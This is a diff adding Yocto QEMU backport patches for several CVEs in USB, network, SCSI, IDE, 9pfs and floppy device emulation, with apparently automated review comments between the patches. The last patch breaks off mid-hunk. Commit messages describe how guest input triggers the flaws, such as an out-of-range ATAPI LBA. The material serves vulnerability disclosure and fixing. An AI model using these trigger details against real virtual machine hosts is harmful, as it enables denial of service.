+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-25625.patch
@@ -0,0 +1,42 @@
+From 1be90ebecc95b09a2ee5af3f60c412b45a766c4f Mon Sep 17 00:00:00 2001
+From: Prasad J Pandit <pjp@fedoraproject.org>
+Date: Tue, 15 Sep 2020 23:52:59 +0530
+Subject: [PATCH] hw: usb: hcd-ohci: check for processed TD before retire
+
+While servicing OHCI transfer descriptors(TD), ohci_service_iso_td
+retires a TD if it has passed its time frame. It does not check if
+the TD was already processed once and holds an error code in TD_CC.
+It may happen if the TD list has a loop. Add check to avoid an
+infinite loop condition.
+
+Signed-off-by: Prasad J Pandit <pjp@fedoraproject.org>
+Reviewed-by: Li Qiang <liq3ea@gmail.com>
+Message-id: 20200915182259.68522-3-ppandit@redhat.com
+Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
+
+Upstream-Status: Backport
+CVE: CVE-2020-25625
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ hw/usb/hcd-ohci.c | 4 ++++
+ 1 file changed, 4 insertions(+)
+
+diff --git a/hw/usb/hcd-ohci.c b/hw/usb/hcd-ohci.c
+index 9dc59101f9..8b912e95d3 100644
+--- a/hw/usb/hcd-ohci.c
++++ b/hw/usb/hcd-ohci.c
+@@ -691,6 +691,10 @@ static int ohci_service_iso_td(OHCIState *ohci, struct ohci_ed *ed,
+ the next ISO TD of the same ED */
+ trace_usb_ohci_iso_td_relative_frame_number_big(relative_frame_number,
+ frame_count);
++ if (OHCI_CC_DATAOVERRUN == OHCI_BM(iso_td.flags, TD_CC)) {
++ /* avoid infinite loop */
++ return 1;
++ }
+ OHCI_SET_BM(iso_td.flags, TD_CC, OHCI_CC_DATAOVERRUN);
+ ed->head &= ~OHCI_DPTR_MASK;
+ ed->head |= (iso_td.next & OHCI_DPTR_MASK);
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-25723.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-25723.patch
new file mode 100644
index 0000000000..e6e0f5ec30
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-25723.patch
@@ -0,0 +1,52 @@
+From 2fdb42d840400d58f2e706ecca82c142b97bcbd6 Mon Sep 17 00:00:00 2001
+From: Li Qiang <liq3ea@163.com>
+Date: Wed, 12 Aug 2020 09:17:27 -0700
+Subject: [PATCH] hw: ehci: check return value of 'usb_packet_map'
+
+If 'usb_packet_map' fails, we should stop to process the usb
+request.
+
+Signed-off-by: Li Qiang <liq3ea@163.com>
+Message-Id: <20200812161727.29412-1-liq3ea@163.com>
+Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
+
+
+Upstream-Status: Backport [https://git.qemu.org/?p=qemu.git;a=commit;h=2fdb42d840400d58f2e706ecca82c142b97bcbd6]
+CVE: CVE-2020-25723
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+
+---
+ hw/usb/hcd-ehci.c | 10 ++++++++--
+ 1 file changed, 8 insertions(+), 2 deletions(-)
+
+diff --git a/hw/usb/hcd-ehci.c b/hw/usb/hcd-ehci.c
+index 58cceac..4da446d 100644
+--- a/hw/usb/hcd-ehci.c
++++ b/hw/usb/hcd-ehci.c
+@@ -1373,7 +1373,10 @@ static int ehci_execute(EHCIPacket *p, const char *action)
+ spd = (p->pid == USB_TOKEN_IN && NLPTR_TBIT(p->qtd.altnext) == 0);
+ usb_packet_setup(&p->packet, p->pid, ep, 0, p->qtdaddr, spd,
+ (p->qtd.token & QTD_TOKEN_IOC) != 0);
+- usb_packet_map(&p->packet, &p->sgl);
++ if (usb_packet_map(&p->packet, &p->sgl)) {
++ qemu_sglist_destroy(&p->sgl);
++ return -1;
++ }
+ p->async = EHCI_ASYNC_INITIALIZED;
+ }
+
+@@ -1453,7 +1456,10 @@ static int ehci_process_itd(EHCIState *ehci,
+ if (ep && ep->type == USB_ENDPOINT_XFER_ISOC) {
+ usb_packet_setup(&ehci->ipacket, pid, ep, 0, addr, false,
+ (itd->transact[i] & ITD_XACT_IOC) != 0);
+- usb_packet_map(&ehci->ipacket, &ehci->isgl);
++ if (usb_packet_map(&ehci->ipacket, &ehci->isgl)) {
++ qemu_sglist_destroy(&ehci->isgl);
++ return -1;
++ }
+ usb_handle_packet(dev, &ehci->ipacket);
+ usb_packet_unmap(&ehci->ipacket, &ehci->isgl);
+ } else {
+--
+1.8.3.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-27617.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-27617.patch
new file mode 100644
index 0000000000..7bfc2beecb
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-27617.patch
@@ -0,0 +1,49 @@
+From 7564bf7701f00214cdc8a678a9f7df765244def1 Mon Sep 17 00:00:00 2001
+From: Prasad J Pandit <pjp@fedoraproject.org>
+Date: Wed, 21 Oct 2020 11:35:50 +0530
+Subject: [PATCH] net: remove an assert call in eth_get_gso_type
+
+eth_get_gso_type() routine returns segmentation offload type based on
+L3 protocol type. It calls g_assert_not_reached if L3 protocol is
+unknown, making the following return statement unreachable. Remove the
+g_assert call, it maybe triggered by a guest user.
+
+Reported-by: Gaoning Pan <pgn@zju.edu.cn>
+Signed-off-by: Prasad J Pandit <pjp@fedoraproject.org>
+Signed-off-by: Jason Wang <jasowang@redhat.com>
+
+Upsteram-Status: Backport
+CVE: CVE-2020-27617
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ net/eth.c | 6 +++---
+ 1 file changed, 3 insertions(+), 3 deletions(-)
+
+diff --git a/net/eth.c b/net/eth.c
+index 0c1d413ee2..1e0821c5f8 100644
+--- a/net/eth.c
++++ b/net/eth.c
+@@ -16,6 +16,7 @@
+ */
+
+ #include "qemu/osdep.h"
++#include "qemu/log.h"
+ #include "net/eth.h"
+ #include "net/checksum.h"
+ #include "net/tap.h"
+@@ -71,9 +72,8 @@ eth_get_gso_type(uint16_t l3_proto, uint8_t *l3_hdr, uint8_t l4proto)
+ return VIRTIO_NET_HDR_GSO_TCPV6 | ecn_state;
+ }
+ }
+-
+- /* Unsupported offload */
+- g_assert_not_reached();
++ qemu_log_mask(LOG_UNIMP, "%s: probably not GSO frame, "
++ "unknown L3 protocol: 0x%04"PRIx16"\n", __func__, l3_proto);
+
+ return VIRTIO_NET_HDR_GSO_NONE | ecn_state;
+ }
+--
+2.25.1
+
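Review bot: The status tag in this patch header is misspelled as `Upsteram-Status: Backport`, so tooling that looks for the `Upstream-Status:` tag will likely treat the patch as carrying no status at all. It should read `Upstream-Status: Backport [<upstream commit URL>]`, with the reference filled in. On the code side, the message that replaces `g_assert_not_reached()` in `eth_get_gso_type()` is keyed on a protocol value the commit message says a guest user can supply, which is worth a one-line comment, e.g. `/* l3_proto is guest-supplied: log and fall back to GSO_NONE, never assert */`.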
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-27821.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-27821.patch
new file mode 100644
index 0000000000..e26bc31bbb
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-27821.patch
@@ -0,0 +1,73 @@
+From 15222d4636d742f3395fd211fad0cd7e36d9f43e Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Tue, 16 Aug 2022 10:07:01 +0530
+Subject: [PATCH] CVE-2020-27821
+
+Upstream-Status: Backport [https://git.qemu.org/?p=qemu.git;a=commit;h=4bfb024bc76973d40a359476dc0291f46e435442]
+CVE: CVE-2020-27821
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+
+memory: clamp cached translation in case it points to an MMIO region
+
+In using the address_space_translate_internal API, address_space_cache_init
+forgot one piece of advice that can be found in the code for
+address_space_translate_internal:
+
+ /* MMIO registers can be expected to perform full-width accesses based only
+ * on their address, without considering adjacent registers that could
+ * decode to completely different MemoryRegions. When such registers
+ * exist (e.g. I/O ports 0xcf8 and 0xcf9 on most PC chipsets), MMIO
+ * regions overlap wildly. For this reason we cannot clamp the accesses
+ * here.
+ *
+ * If the length is small (as is the case for address_space_ldl/stl),
+ * everything works fine. If the incoming length is large, however,
+ * the caller really has to do the clamping through memory_access_size.
+ */
+
+address_space_cache_init is exactly one such case where "the incoming length
+is large", therefore we need to clamp the resulting length---not to
+memory_access_size though, since we are not doing an access yet, but to
+the size of the resulting section. This ensures that subsequent accesses
+to the cached MemoryRegionSection will be in range.
+
+With this patch, the enclosed testcase notices that the used ring does
+not fit into the MSI-X table and prints a "qemu-system-x86_64: Cannot map used"
+error.
+
+Signed-off-by: Paolo Bonzini <pbonzini@redhat.com>
+---
+ exec.c | 10 ++++++++++
+ 1 file changed, 10 insertions(+)
+
+diff --git a/exec.c b/exec.c
+index 2d6add46..1360051a 100644
+--- a/exec.c
++++ b/exec.c
+@@ -3632,6 +3632,7 @@ int64_t address_space_cache_init(MemoryRegionCache *cache,
+ AddressSpaceDispatch *d;
+ hwaddr l;
+ MemoryRegion *mr;
++ Int128 diff;
+
+ assert(len > 0);
+
+@@ -3640,6 +3641,15 @@ int64_t address_space_cache_init(MemoryRegionCache *cache,
+ d = flatview_to_dispatch(cache->fv);
+ cache->mrs = *address_space_translate_internal(d, addr, &cache->xlat, &l, true);
+
++ /*
++ * cache->xlat is now relative to cache->mrs.mr, not to the section itself.
++ * Take that into account to compute how many bytes are there between
++ * cache->xlat and the end of the section.
++ */
++ diff = int128_sub(cache->mrs.size,
++ int128_make64(cache->xlat - cache->mrs.offset_within_region));
++ l = int128_get64(int128_min(diff, int128_make64(l)));
++
+ mr = cache->mrs.mr;
+ memory_region_ref(mr);
+ if (memory_access_is_direct(mr, is_write)) {
+--
+2.25.1
+
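Review bot: The mbox header of this patch names the backporter in `From:` and uses `[PATCH] CVE-2020-27821` as the subject, with a commit id on the first line that differs from the upstream commit cited in `Upstream-Status`. The original subject ("memory: clamp cached translation in case it points to an MMIO region") survives only in the body, and the upstream author only as a `Signed-off-by:`, so mbox-based tooling would misattribute the change. I would keep the upstream `From:`, `Date:` and `Subject:` lines and add the backporter only as a trailing `Signed-off-by:`, as the sibling patches do. In the hunk itself, `int128_get64()` is applied to a minimum that, as far as I can tell, only fits in 64 bits when `diff` is non-negative; a comment stating that `cache->xlat` cannot lie past the end of the section would make that assumption explicit (the rest of `address_space_cache_init()` is outside the hunk).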
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-28916.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-28916.patch
new file mode 100644
index 0000000000..756b1c1495
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-28916.patch
@@ -0,0 +1,48 @@
+From c2cb511634012344e3d0fe49a037a33b12d8a98a Mon Sep 17 00:00:00 2001
+From: Prasad J Pandit <pjp@fedoraproject.org>
+Date: Wed, 11 Nov 2020 18:36:36 +0530
+Subject: [PATCH] hw/net/e1000e: advance desc_offset in case of null descriptor
+
+While receiving packets via e1000e_write_packet_to_guest() routine,
+'desc_offset' is advanced only when RX descriptor is processed. And
+RX descriptor is not processed if it has NULL buffer address.
+This may lead to an infinite loop condition. Increament 'desc_offset'
+to process next descriptor in the ring to avoid infinite loop.
+
+Reported-by: Cheol-woo Myung <330cjfdn@gmail.com>
+Signed-off-by: Prasad J Pandit <pjp@fedoraproject.org>
+Signed-off-by: Jason Wang <jasowang@redhat.com>
+
+Upstream-Status: Backport
+CVE: CVE-2020-28916
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ hw/net/e1000e_core.c | 8 ++++----
+ 1 file changed, 4 insertions(+), 4 deletions(-)
+
+diff --git a/hw/net/e1000e_core.c b/hw/net/e1000e_core.c
+index d8b9e4b2f4..095c01ebc6 100644
+--- a/hw/net/e1000e_core.c
++++ b/hw/net/e1000e_core.c
+@@ -1596,13 +1596,13 @@ e1000e_write_packet_to_guest(E1000ECore *core, struct NetRxPkt *pkt,
+ (const char *) &fcs_pad, e1000x_fcs_len(core->mac));
+ }
+ }
+- desc_offset += desc_size;
+- if (desc_offset >= total_size) {
+- is_last = true;
+- }
+ } else { /* as per intel docs; skip descriptors with null buf addr */
+ trace_e1000e_rx_null_descriptor();
+ }
++ desc_offset += desc_size;
++ if (desc_offset >= total_size) {
++ is_last = true;
++ }
+
+ e1000e_write_rx_descr(core, desc, is_last ? core->rx_pkt : NULL,
+ rss_info, do_ps ? ps_hdr_len : 0, &bastate.written);
+--
+2.25.1
+
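Review bot: Moving `desc_offset += desc_size` out of the `if` means a descriptor with a null buffer address now consumes `desc_size` bytes of the packet although nothing was written for it, while the existing comment on the `else` branch still only says the descriptor is skipped. That is presumably the intended way to guarantee progress, but it should be stated, e.g. `/* advance even for null descriptors so a ring of null buffers cannot stall the loop; that span of the packet is dropped */`. How `desc_size` is computed lies outside the hunk, so the dropped-data reading needs confirming against the full `e1000e_write_packet_to_guest()`.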
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-29443.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-29443.patch
new file mode 100644
index 0000000000..1528d5c2fd
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-29443.patch
@@ -0,0 +1,45 @@
+From 813212288970c39b1800f63e83ac6e96588095c6 Mon Sep 17 00:00:00 2001
+From: Paolo Bonzini <pbonzini@redhat.com>
+Date: Tue, 1 Dec 2020 13:09:26 +0100
+Subject: [PATCH] ide: atapi: assert that the buffer pointer is in range
+
+A case was reported where s->io_buffer_index can be out of range.
+The report skimped on the details but it seems to be triggered
+by s->lba == -1 on the READ/READ CD paths (e.g. by sending an
+ATAPI command with LBA = 0xFFFFFFFF). For now paper over it
+with assertions. The first one ensures that there is no overflow
+when incrementing s->io_buffer_index, the second checks for the
+buffer overrun.
+
+Note that the buffer overrun is only a read, so I am not sure
+if the assertion failure is actually less harmful than the overrun.
+
+Signed-off-by: Paolo Bonzini <pbonzini@redhat.com>
+Message-id: 20201201120926.56559-1-pbonzini@redhat.com
+Reviewed-by: Kevin Wolf <kwolf@redhat.com>
+Signed-off-by: Peter Maydell <peter.maydell@linaro.org>
+
+Upstream-Status: Backport
+CVE: CVE-2020-29443
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ hw/ide/atapi.c | 2 ++
+ 1 file changed, 2 insertions(+)
+
+diff --git a/hw/ide/atapi.c b/hw/ide/atapi.c
+index 14a2b0bb2f..e79157863f 100644
+--- a/hw/ide/atapi.c
++++ b/hw/ide/atapi.c
+@@ -276,6 +276,8 @@ void ide_atapi_cmd_reply_end(IDEState *s)
+ s->packet_transfer_size -= size;
+ s->elementary_transfer_size -= size;
+ s->io_buffer_index += size;
++ assert(size <= s->io_buffer_total_len);
++ assert(s->io_buffer_index <= s->io_buffer_total_len);
+
+ /* Some adapters process PIO data right away. In that case, we need
+ * to avoid mutual recursion between ide_transfer_start
+--
+2.25.1
+
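Review bot: The two `assert()` calls in `ide_atapi_cmd_reply_end()` run after `s->io_buffer_index += size` and test values the commit message says a guest can drive out of range, so they turn an out-of-bounds read into a guest-triggerable abort of the QEMU process. The message itself calls this papering over, so the recipe should not treat this patch as the complete fix; I would confirm that a follow-up validating the LBA and read size on the READ/READ CD paths is also carried, and say so in the patch header. A comment such as `/* stopgap: guest-reachable; real validation belongs in the command handlers */` above the assertions would keep that visible. The function body continues outside the hunk.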
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-35504.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-35504.patch
new file mode 100644
index 0000000000..97d32589d8
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-35504.patch
@@ -0,0 +1,51 @@
+Backport of:
+
+From 0db895361b8a82e1114372ff9f4857abea605701 Mon Sep 17 00:00:00 2001
+From: Mark Cave-Ayland <mark.cave-ayland@ilande.co.uk>
+Date: Wed, 7 Apr 2021 20:57:50 +0100
+Subject: [PATCH] esp: always check current_req is not NULL before use in DMA
+ callbacks
+
+After issuing a SCSI command the SCSI layer can call the SCSIBusInfo .cancel
+callback which resets both current_req and current_dev to NULL. If any data
+is left in the transfer buffer (async_len != 0) then the next TI (Transfer
+Information) command will attempt to reference the NULL pointer causing a
+segfault.
+
+Buglink: https://bugs.launchpad.net/qemu/+bug/1910723
+Buglink: https://bugs.launchpad.net/qemu/+bug/1909247
+Signed-off-by: Mark Cave-Ayland <mark.cave-ayland@ilande.co.uk>
+Tested-by: Alexander Bulekov <alxndr@bu.edu>
+Message-Id: <20210407195801.685-2-mark.cave-ayland@ilande.co.uk>
+
+CVE: CVE-2020-35504
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/qemu/tree/debian/patches/CVE-2020-35504.patch?h=ubuntu/focal-security Upstream commit https://github.com/qemu/qemu/commit/0db895361b8a82e1114372ff9f4857abea605701 ]
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/scsi/esp.c | 19 ++++++++++++++-----
+ 1 file changed, 14 insertions(+), 5 deletions(-)
+
+--- a/hw/scsi/esp.c
++++ b/hw/scsi/esp.c
+@@ -362,6 +362,11 @@ static void do_dma_pdma_cb(ESPState *s)
+ do_cmd(s, s->cmdbuf);
+ return;
+ }
++
++ if (!s->current_req) {
++ return;
++ }
++
+ s->dma_left -= len;
+ s->async_buf += len;
+ s->async_len -= len;
+@@ -415,6 +420,9 @@ static void esp_do_dma(ESPState *s)
+ do_cmd(s, s->cmdbuf);
+ return;
+ }
++ if (!s->current_req) {
++ return;
++ }
+ if (s->async_len == 0) {
+ /* Defer until data is available. */
+ return;
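Review bot: The diffstat in this patch header announces 14 insertions and 5 deletions in hw/scsi/esp.c, but the two hunks shown add only the `!s->current_req` guards in `do_dma_pdma_cb()` and `esp_do_dma()` and delete nothing. The `Backport of:` line suggests the upstream change was trimmed for this QEMU version, yet the header does not say which parts were dropped or why. I would add a sentence to the header listing the upstream hunks that were omitted and the reason, and correct the diffstat, so a later audit can tell whether any other DMA callback still dereferences `current_req` unchecked. Both functions extend beyond the hunks.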
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-35505.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-35505.patch
new file mode 100644
index 0000000000..40c0b1e74f
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-35505.patch
@@ -0,0 +1,45 @@
+Backport of:
+
+From 99545751734035b76bd372c4e7215bb337428d89 Mon Sep 17 00:00:00 2001
+From: Mark Cave-Ayland <mark.cave-ayland@ilande.co.uk>
+Date: Wed, 7 Apr 2021 20:57:55 +0100
+Subject: [PATCH] esp: ensure cmdfifo is not empty and current_dev is non-NULL
+MIME-Version: 1.0
+Content-Type: text/plain; charset=utf8
+Content-Transfer-Encoding: 8bit
+
+When about to execute a SCSI command, ensure that cmdfifo is not empty and
+current_dev is non-NULL. This can happen if the guest tries to execute a TI
+(Transfer Information) command without issuing one of the select commands
+first.
+
+Buglink: https://bugs.launchpad.net/qemu/+bug/1910723
+Buglink: https://bugs.launchpad.net/qemu/+bug/1909247
+Signed-off-by: Mark Cave-Ayland <mark.cave-ayland@ilande.co.uk>
+Reviewed-by: Philippe Mathieu-Daudé <f4bug@amsat.org>
+Tested-by: Alexander Bulekov <alxndr@bu.edu>
+Message-Id: <20210407195801.685-7-mark.cave-ayland@ilande.co.uk>
+
+CVE: CVE-2020-35505
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/qemu/tree/debian/patches/CVE-2020-35505.patch?h=ubuntu/focal-security Upstream commit https://github.com/qemu/qemu/commit/99545751734035b76bd372c4e7215bb337428d89 ]
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+Signed-off-by: Emily Vekariya <emily.vekariya@einfochips.com>
+---
+ hw/scsi/esp.c | 4 ++++
+ 1 file changed, 4 insertions(+)
+
+diff --git a/hw/scsi/esp.c b/hw/scsi/esp.c
+index c7d701bf..c2a67bc8 100644
+--- a/hw/scsi/esp.c
++++ b/hw/scsi/esp.c
+@@ -193,6 +193,10 @@ static void do_busid_cmd(ESPState *s, uint8_t *buf, uint8_t busid)
+
+ trace_esp_do_busid_cmd(busid);
+ lun = busid & 7;
++
++ if (!s->current_dev) {
++ return;
++ }
+ current_lun = scsi_device_find(&s->bus, 0, s->current_dev->id, lun);
+ s->current_req = scsi_req_new(current_lun, 0, lun, buf, s);
+ datalen = scsi_req_enqueue(s->current_req);
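Review bot: The subject promises that cmdfifo is non-empty and that `current_dev` is non-NULL, but the hunk in `do_busid_cmd()` adds only the `!s->current_dev` check. If the cmdfifo part does not apply to this QEMU version, the patch header should say so in a sentence of its own rather than leave the subject and the code in disagreement. The early return is also silent and comes after `trace_esp_do_busid_cmd(busid)`; a comment like `/* guest issued a command without a prior select: no device to address */` would document the intent. The function continues outside the hunk.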
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-20181.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-20181.patch
new file mode 100644
index 0000000000..1b8c77f838
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-20181.patch
@@ -0,0 +1,81 @@
+From c2d2d14e8deece958bbc4fc649d22c3564bc4e7e Mon Sep 17 00:00:00 2001
+From: Greg Kurz <groug@kaod.org>
+Date: Thu, 14 Jan 2021 17:04:12 +0100
+Subject: [PATCH] 9pfs: Fully restart unreclaim loop (CVE-2021-20181)
+
+Depending on the client activity, the server can be asked to open a huge
+number of file descriptors and eventually hit RLIMIT_NOFILE. This is
+currently mitigated using a reclaim logic : the server closes the file
+descriptors of idle fids, based on the assumption that it will be able
+to re-open them later. This assumption doesn't hold of course if the
+client requests the file to be unlinked. In this case, we loop on the
+entire fid list and mark all related fids as unreclaimable (the reclaim
+logic will just ignore them) and, of course, we open or re-open their
+file descriptors if needed since we're about to unlink the file.
+
+This is the purpose of v9fs_mark_fids_unreclaim(). Since the actual
+opening of a file can cause the coroutine to yield, another client
+request could possibly add a new fid that we may want to mark as
+non-reclaimable as well. The loop is thus restarted if the re-open
+request was actually transmitted to the backend. This is achieved
+by keeping a reference on the first fid (head) before traversing
+the list.
+
+This is wrong in several ways:
+- a potential clunk request from the client could tear the first
+ fid down and cause the reference to be stale. This leads to a
+ use-after-free error that can be detected with ASAN, using a
+ custom 9p client
+- fids are added at the head of the list : restarting from the
+ previous head will always miss fids added by a some other
+ potential request
+
+All these problems could be avoided if fids were being added at the
+end of the list. This can be achieved with a QSIMPLEQ, but this is
+probably too much change for a bug fix. For now let's keep it
+simple and just restart the loop from the current head.
+
+Fixes: CVE-2021-20181
+Buglink: https://bugs.launchpad.net/qemu/+bug/1911666
+Reported-by: Zero Day Initiative <zdi-disclosures@trendmicro.com>
+Reviewed-by: Christian Schoenebeck <qemu_oss@crudebyte.com>
+Reviewed-by: Stefano Stabellini <sstabellini@kernel.org>
+Message-Id: <161064025265.1838153.15185571283519390907.stgit@bahia.lan>
+Signed-off-by: Greg Kurz <groug@kaod.org>
+
+Upstream-Status: Backport [89fbea8737e8f7b954745a1ffc4238d377055305]
+CVE: CVE-2021-20181
+
+Signed-off-by: Sakib Sajal <sakib.sajal@windriver.com>
+---
+ hw/9pfs/9p.c | 6 +++---
+ 1 file changed, 3 insertions(+), 3 deletions(-)
+
+diff --git a/hw/9pfs/9p.c b/hw/9pfs/9p.c
+index 94df440fc..6026b51a1 100644
+--- a/hw/9pfs/9p.c
++++ b/hw/9pfs/9p.c
+@@ -502,9 +502,9 @@ static int coroutine_fn v9fs_mark_fids_unreclaim(V9fsPDU *pdu, V9fsPath *path)
+ {
+ int err;
+ V9fsState *s = pdu->s;
+- V9fsFidState *fidp, head_fid;
++ V9fsFidState *fidp;
+
+- head_fid.next = s->fid_list;
++again:
+ for (fidp = s->fid_list; fidp; fidp = fidp->next) {
+ if (fidp->path.size != path->size) {
+ continue;
+@@ -524,7 +524,7 @@ static int coroutine_fn v9fs_mark_fids_unreclaim(V9fsPDU *pdu, V9fsPath *path)
+ * switched to the worker thread
+ */
+ if (err == 0) {
+- fidp = &head_fid;
++ goto again;
+ }
+ }
+ }
+--
+2.29.2
+
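Review bot: Termination of the new `goto again` restart in v9fs_mark_fids_unreclaim() is not evident from the hunk: every `err == 0` result rescans from `s->fid_list`, so the loop only ends if the reopen call stops returning 0 for a fid handled on an earlier pass, and that call is outside the visible lines. A short comment at the label would record the assumption, e.g. `/* restart is bounded: a fid reopened on a previous pass is expected not to return 0 again (confirm against the reopen helper) */`. The function body continues outside both inner hunks, so this should be checked against the full 9p.c of the QEMU version the recipe builds.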
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-20196.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-20196.patch
new file mode 100644
index 0000000000..e9b815740f
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-20196.patch
@@ -0,0 +1,62 @@
+From 94608c59045791dfd35102bc59b792e96f2cfa30 Mon Sep 17 00:00:00 2001
+From: Vivek Kumbhar <vkumbhar@mvista.com>
+Date: Tue, 29 Nov 2022 15:57:13 +0530
+Subject: [PATCH] CVE-2021-20196
+
+Upstream-Status: Backport [https://gitlab.com/qemu-project/qemu/-/commit/1ab95af033a419e7a64e2d58e67dd96b20af5233]
+CVE: CVE-2021-20196
+Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
+
+hw/block/fdc: Kludge missing floppy drive to fix CVE-2021-20196
+
+Guest might select another drive on the bus by setting the
+DRIVE_SEL bit of the DIGITAL OUTPUT REGISTER (DOR).
+The current controller model doesn't expect a BlockBackend
+to be NULL. A simple way to fix CVE-2021-20196 is to create
+an empty BlockBackend when it is missing. All further
+accesses will be safely handled, and the controller state
+machines keep behaving correctly.
+---
+ hw/block/fdc.c | 19 ++++++++++++++++++-
+ 1 file changed, 18 insertions(+), 1 deletion(-)
+
+diff --git a/hw/block/fdc.c b/hw/block/fdc.c
+index ac5d31e8..e128e975 100644
+--- a/hw/block/fdc.c
++++ b/hw/block/fdc.c
+@@ -58,6 +58,11 @@
+ } \
+ } while (0)
+
++/* Anonymous BlockBackend for empty drive */
++static BlockBackend *blk_create_empty_drive(void)
++{
++ return blk_new(qemu_get_aio_context(), 0, BLK_PERM_ALL);
++}
+
+ /********************************************************/
+ /* qdev floppy bus */
+@@ -1356,7 +1361,19 @@ static FDrive *get_drv(FDCtrl *fdctrl, int unit)
+
+ static FDrive *get_cur_drv(FDCtrl *fdctrl)
+ {
+- return get_drv(fdctrl, fdctrl->cur_drv);
++ FDrive *cur_drv = get_drv(fdctrl, fdctrl->cur_drv);
++
++ if (!cur_drv->blk) {
++ /*
++ * Kludge: empty drive line selected. Create an anonymous
++ * BlockBackend to avoid NULL deref with various BlockBackend
++ * API calls within this model (CVE-2021-20196).
++ * Due to the controller QOM model limitations, we don't
++ * attach the created to the controller device.
++ */
++ cur_drv->blk = blk_create_empty_drive();
++ }
++ return cur_drv;
+ }
+
+ /* Status A register : 0x00 (read-only) */
+--
+2.25.1
+
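Review bot: The BlockBackend that get_cur_drv() now creates for an empty drive line has no visible release. `cur_drv->blk = blk_create_empty_drive();` stores it on a guest-selectable path, and the in-code comment says it is not attached to the controller device, so any code that tests `blk` for NULL to detect an empty drive will presumably see a non-NULL value afterwards. I would extend the comment with `* The backend lives as long as the FDrive; nothing unrefs it (confirm).`. Separately, the patch header names the backporter in `From:` with the subject `CVE-2021-20196` and carries no upstream author or sign-off lines, so provenance rests entirely on the Upstream-Status URL.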
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-20203.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-20203.patch
new file mode 100644
index 0000000000..31440af0bd
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-20203.patch
@@ -0,0 +1,74 @@
+From: Prasad J Pandit <pjp@fedoraproject.org>
+
+While activating device in vmxnet3_acticate_device(), it does not
+validate guest supplied configuration values against predefined
+minimum - maximum limits. This may lead to integer overflow or
+OOB access issues. Add checks to avoid it.
+
+Fixes: CVE-2021-20203
+Buglink: https://bugs.launchpad.net/qemu/+bug/1913873
+Reported-by: Gaoning Pan <pgn@zju.edu.cn>
+Signed-off-by: Prasad J Pandit <pjp@fedoraproject.org>
+
+Upstream-Status: Acepted [https://lists.gnu.org/archive/html/qemu-devel/2021-01/msg07935.html]
+CVE: CVE-2021-20203
+Signed-off-by: Minjae Kim <flowergom@gmail.com>
+---
+ hw/net/vmxnet3.c | 13 +++++++++++++
+ 1 file changed, 13 insertions(+)
+
+diff --git a/hw/net/vmxnet3.c b/hw/net/vmxnet3.c
+index eff299f629..4a910ca971 100644
+--- a/hw/net/vmxnet3.c
++++ b/hw/net/vmxnet3.c
+@@ -1420,6 +1420,7 @@ static void vmxnet3_activate_device(VMXNET3State *s)
+ vmxnet3_setup_rx_filtering(s);
+ /* Cache fields from shared memory */
+ s->mtu = VMXNET3_READ_DRV_SHARED32(d, s->drv_shmem, devRead.misc.mtu);
++ assert(VMXNET3_MIN_MTU <= s->mtu && s->mtu < VMXNET3_MAX_MTU);
+ VMW_CFPRN("MTU is %u", s->mtu);
+
+ s->max_rx_frags =
+@@ -1473,6 +1474,9 @@ static void vmxnet3_activate_device(VMXNET3State *s)
+ /* Read rings memory locations for TX queues */
+ pa = VMXNET3_READ_TX_QUEUE_DESCR64(d, qdescr_pa, conf.txRingBasePA);
+ size = VMXNET3_READ_TX_QUEUE_DESCR32(d, qdescr_pa, conf.txRingSize);
++ if (size > VMXNET3_TX_RING_MAX_SIZE) {
++ size = VMXNET3_TX_RING_MAX_SIZE;
++ }
+
+ vmxnet3_ring_init(d, &s->txq_descr[i].tx_ring, pa, size,
+ sizeof(struct Vmxnet3_TxDesc), false);
